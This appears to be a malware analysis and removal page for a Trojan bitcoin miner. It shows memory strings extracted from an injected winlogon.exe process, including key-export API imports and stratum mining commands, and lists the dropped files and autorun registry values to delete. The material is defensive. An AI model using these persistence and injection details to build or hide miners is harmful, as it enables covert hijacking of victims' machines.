PKEY_GOST01_PARAMGEN
PKEY_GOST2001_DERIVE
PKEY_GOST94CP_DECRYPT
PKEY_GOST94CP_ENCRYPT
PKEY_GOST94CP_KEYGEN
PKEY_GOST94_PARAMGEN
PKEY_GOST_CTRL
PKEY_GOST_CTRL01_STR
PKEY_GOST_CTRL94_STR
PKEY_GOST_MAC_CTRL
PKEY_GOST_MAC_CTRL_STR
PKEY_GOST_MAC_KEYGEN
bad key parameters format
bad pkey parameters format
cannot pack ephemeral key
error computing shared key
error packing key transport info
error parsing key transport info
invalid mac key length
key is not initalized
key is not initialized
key parameters missing
mac key not set
no peer key
no private part of non ephemeral keypair
public key undefined
unsupported cipher ctl command
unsupported parameter set
engines\ccgost\gost2001_keyx.c
gkt->key_agreement_info->eph_iv->length==8
gkt->key_info->encrypted_key->length==32
gkt->key_info->imit->length==4
engines\ccgost\gost94_keyx.c
Private key:
Public key:
Parameter set: %s
Public key:
GOST_CLIENT_KEY_EXCHANGE_PARAMS
key_info
key_agreement_info
GOST_KEY_TRANSPORT
encrypted_key
GOST_KEY_INFO
ephem_key
GOST_KEY_AGREEMENT_INFO
key_params
GOST_KEY_PARAMS
ENGINE_set_pkey_meths failed
ENGINE_set_pkey_asn1_meths failed
ENGINE_set_cmd_defns failed
C:\OUT\FINAL_OUT\Release\PDB\openssl.pdb
OPENSSL.dll
CryptGetUserKey
CryptExportKey
CryptDestroyKey
ReportEventA
CertGetCertificateContextProperty
CertFreeCertificateContext
CertDuplicateCertificateContext
CertFindCertificateInStore
CertEnumCertificatesInStore
CertCloseStore
CertOpenStore
GetProcessWindowStation
~L?(5p%0XX
%Fn-#
.text
`.rdata
@.data
.rsrc
@.reloc
winlogon.exe_2224_rwx_13801000_00013000:
advapi32.dll
Why do most humans not understand their shortcomings? The funny thing with the human brain is it makes everyone arrogant at their core. Sure some may fight it more than others but in every brain there is something telling them, HEY YOU ARE THE MOST IMPORTANT PERSON IN THE WORLD. THE CENTER OF THE UNIVERSE. But we can't all be that, can we? Well perhaps we can, introducing GODria, take 2 pills of this daily and you can be like RealSolid, lord of the universe.
C:\OUT\FINAL_OUT\Release\PDB\coinutil.pdb
.?AV?$CIndexedContainer@_KVCVector@ExtSTL@@V?$allocator@_K@2@@ExtSTL@@
.?AV?$CIndexedContainer@DVCVector@ExtSTL@@V?$allocator@D@2@@ExtSTL@@
.?AV?$CIndexedContainer@EVCVector@ExtSTL@@V?$allocator@E@2@@ExtSTL@@
.text
`.rdata
@.data
.rsrc
@.reloc
File coin-chains.xml not Found or corrupted
winlogon.exe_2224_rwx_13901000_00067000:
IMAGE_FORMAT_NOT_SUPPORTED
PROGRAM_EXECUTABLE
OPERATION
atiadlxy.dll
atiadlxx.dll
.text
opencl.dll
fpgaminer_x6500-overclocker-0402.bit
http://ufasoft.com
PortName
http://
^(http://)?[^/] (/)?
"host":"([^"] )","port":(\d ),"ttr":(\d )
btc-evergreen.il
btc.il
phatk.cl
scrypt.cl
phatk.ptx
stratum tcp
xpt tcp
kernel32.dll
mining.submit
mining.set_difficulty
mining.notify
mining.subscribe
mining.authorize
OpenCL.dll
C:\OUT\FINAL_OUT\Release\PDB\miner.pdb
.?AV?$CIndexedContainer@DVCVector@ExtSTL@@V?$allocator@D@2@@ExtSTL@@
.?AV?$CIndexedContainer@IVCVector@ExtSTL@@V?$allocator@I@2@@ExtSTL@@
.?AV?$CIndexedContainer@U?$pair@VCBaseIterator@CList@ExtSTL@@V123@@ExtSTL@@VCVector@2@V?$allocator@U?$pair@VCBaseIterator@CList@ExtSTL@@V123@@ExtSTL@@@2@@ExtSTL@@
.?AV?$CIndexedContainer@_KVCVector@ExtSTL@@V?$allocator@_K@2@@ExtSTL@@
.?AV?$CIndexedContainer@PAXVCVector@ExtSTL@@V?$allocator@PAX@2@@ExtSTL@@
.?AV?$CIndexedContainer@VPlatform@cl@Ext@@VCVector@ExtSTL@@V?$allocator@VPlatform@cl@Ext@@@5@@ExtSTL@@
.?AV?$CIndexedContainer@VDevice@cl@Ext@@VCVector@ExtSTL@@V?$allocator@VDevice@cl@Ext@@@5@@ExtSTL@@
.?AV?$CIndexedContainer@UProgramBinary@cl@Ext@@VCVector@ExtSTL@@V?$allocator@UProgramBinary@cl@Ext@@@5@@ExtSTL@@
.?AV?$CIndexedContainer@PBDVCVector@ExtSTL@@V?$allocator@PBD@2@@ExtSTL@@
.?AV?$CIndexedContainer@UAdapterInfo@@VCVector@ExtSTL@@V?$allocator@UAdapterInfo@@@3@@ExtSTL@@
.?AV?$CIndexedContainer@_WVCVector@ExtSTL@@V?$allocator@_W@2@@ExtSTL@@
.?AVCCmdTarget@Ext@@
.?AV?$CIndexedContainer@VString@Ext@@VCVector@ExtSTL@@V?$allocator@VString@Ext@@@4@@ExtSTL@@
.?AV?$CIndexedContainer@V?$ptr@VComputationDevice@Coin@@VInterlocked@Ext@@@Ext@@VCVector@ExtSTL@@V?$allocator@V?$ptr@VComputationDevice@Coin@@VInterlocked@Ext@@@Ext@@@4@@ExtSTL@@
.?AV?$CIndexedContainer@V?$ptr@VThread@Ext@@VInterlocked@2@@Ext@@VCVector@ExtSTL@@V?$allocator@V?$ptr@VThread@Ext@@VInterlocked@2@@Ext@@@4@@ExtSTL@@
.?AV?$vector@USUrlTtr@Coin@@V?$allocator@USUrlTtr@Coin@@@ExtSTL@@@ExtSTL@@
.?AV?$CIndexedContainer@USUrlTtr@Coin@@VCVector@ExtSTL@@V?$allocator@USUrlTtr@Coin@@@4@@ExtSTL@@
.?AV?$CContainer@USUrlTtr@Coin@@VCVector@ExtSTL@@V?$allocator@USUrlTtr@Coin@@@4@@ExtSTL@@
.?AV?$CIndexedContainer@VAdlDevice@Gpu@Ext@@VCVector@ExtSTL@@V?$allocator@VAdlDevice@Gpu@Ext@@@5@@ExtSTL@@
.?AV?$CIndexedContainer@V?$ptr@VGpuDevice@Coin@@VInterlocked@Ext@@@Ext@@VCVector@ExtSTL@@V?$allocator@V?$ptr@VGpuDevice@Coin@@VInterlocked@Ext@@@Ext@@@4@@ExtSTL@@
.?AV?$CIndexedContainer@V?$ptr@VGpuTask@Coin@@VNonInterlocked@Ext@@@Ext@@VCVector@ExtSTL@@V?$allocator@V?$ptr@VGpuTask@Coin@@VNonInterlocked@Ext@@@Ext@@@4@@ExtSTL@@
.?AV?$CIndexedContainer@USection@Coin@@VCVector@ExtSTL@@V?$allocator@USection@Coin@@@4@@ExtSTL@@
.?AV?$CIndexedContainer@VGDevice@Coin@@VCVector@ExtSTL@@V?$allocator@VGDevice@Coin@@@4@@ExtSTL@@
.?AV?$CIndexedContainer@V?$sub_match@PBD@ExtSTL@@VCVector@2@V?$allocator@V?$sub_match@PBD@ExtSTL@@@2@@ExtSTL@@
.?AVRegistryKey@Ext@@
.?AV?$CIndexedContainer@UFreqData@Coin@@VCVector@ExtSTL@@V?$allocator@UFreqData@Coin@@@4@@ExtSTL@@
.?AV?$CIndexedContainer@VEvent@cl@Ext@@VCVector@ExtSTL@@V?$allocator@VEvent@cl@Ext@@@5@@ExtSTL@@
.?AV?$CIndexedContainer@VBuffer@cl@Ext@@VCVector@ExtSTL@@V?$allocator@VBuffer@cl@Ext@@@5@@ExtSTL@@
.?AV?$CIndexedContainer@U?$pair@VBuffer@cl@Ext@@VEvent@23@@ExtSTL@@VCDeque@2@V?$allocator@U?$pair@VBuffer@cl@Ext@@VEvent@23@@ExtSTL@@@2@@ExtSTL@@
.?AVWebHeaderCollection@Ext@@
.?AVHttpWebResponse@Ext@@
.?AVWebClient@Ext@@
.?AV?$CIndexedContainer@VHashValue@Coin@@VCVector@ExtSTL@@V?$allocator@VHashValue@Coin@@@4@@ExtSTL@@
.?AV?$CIndexedContainer@UMinerTx@Coin@@VCVector@ExtSTL@@V?$allocator@UMinerTx@Coin@@@4@@ExtSTL@@
.?AVBitcoinWebClient@Coin@@
.?AV?$CIndexedContainer@UDtHashesChains@GetWorkThread@Coin@@VCDeque@ExtSTL@@V?$allocator@UDtHashesChains@GetWorkThread@Coin@@@5@@ExtSTL@@
.?AV?$CIndexedContainer@PAV?$CSocketKeeper@V?$SocketThreadWrap@VThread@Ext@@@Ext@@@Ext@@VCVector@ExtSTL@@V?$allocator@PAV?$CSocketKeeper@V?$SocketThreadWrap@VThread@Ext@@@Ext@@@Ext@@@4@@ExtSTL@@
.?AV?$CIndexedContainer@VVarValue@Ext@@VCVector@ExtSTL@@V?$allocator@VVarValue@Ext@@@4@@ExtSTL@@
SetupDiOpenDevRegKey
?GetPortNames@SerialPort@Ext@@SG?AV?$vector@VString@Ext@@V?$allocator@VString@Ext@@@ExtSTL@@@ExtSTL@@XZ
?Join@String@Ext@@SG?AV12@ABV12@ABV?$vector@VString@Ext@@V?$allocator@VString@Ext@@@ExtSTL@@@ExtSTL@@@Z
>".%C,)
00 (~ 80(0(
1000000
(($,$ $($0$ 4$$ $
`.rdata
@.data
.rsrc
@.reloc
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
%original file name%.exe:3948
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\Application Data\zTIcT\phatk.cl (606 bytes)
%Documents and Settings%\%current user%\Application Data\zTIcT\winlogon.exe (196 bytes)
%Documents and Settings%\%current user%\Application Data\zTIcT\miner.dll (4899 bytes)
%Documents and Settings%\%current user%\Application Data\zTIcT\usft_ext.dll (15324 bytes)
%Documents and Settings%\%current user%\Application Data\zTIcT\mpir.dll (8280 bytes)
%Documents and Settings%\%current user%\Application Data\zTIcT\taskengine.exe (601 bytes)
%Documents and Settings%\%current user%\Application Data\zTIcT\coinutil.dll (1924 bytes)
%Documents and Settings%\%current user%\Application Data\zTIcT\openssl.dll (10156 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\bdllsysinc (601 bytes)
- Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"sysetyo" = "%Documents and Settings%\%current user%\Application Data\Microsoft\bdllsysinc"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Default" = "%Documents and Settings%\%current user%\Application Data\zTIcT\taskengine.exe"
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.